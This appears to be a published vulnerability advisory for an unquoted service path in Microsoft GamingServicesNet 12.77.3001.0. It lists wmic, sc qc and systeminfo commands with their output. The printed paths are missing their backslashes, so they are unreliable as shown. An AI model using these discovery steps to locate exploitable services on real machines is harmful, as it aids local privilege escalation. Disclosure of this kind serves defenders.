Microsoft GamingServicesNet version 12.77.3001.0 suffers from an unquoted service path vulnerability.
# Exploit Title: Microsoft GamingServicesNet 12.77.3001.0 -
'GamingServicesNet' Unquoted Service Path
# Exploit Author: tmrswrr
# Exploit Date: 2023-05.17
# Vendor : https://www.microsoft.com/store/productId/9MWPM2CQNLHN
# Version : 12.77.3001.0
# Tested on OS: Windows 10 Enterprise
# Step to discover Unquoted Service Path:
==============
>> wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:windows" |findstr /i /v """
Gaming Services GamingServicesNet
C:Program
FilesWindowsAppsMicrosoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbweGamingServicesNet.exe
Auto
C:>sc qc GamingServicesNet
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GamingServicesNet
TYPE : 210 WIN32_PACKAGED_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:Program
FilesWindowsAppsMicrosoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbweGamingServicesNet.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Gaming Services
DEPENDENCIES : staterepository
SERVICE_START_NAME : NT AUTHORITYLocalService
C:>systeminfo
Host Name: DESKTOP-JAN8AJH
OS Name: Microsoft Windows 10 Enterprise Evaluation
OS Version: 10.0.19045 N/A Build 19045
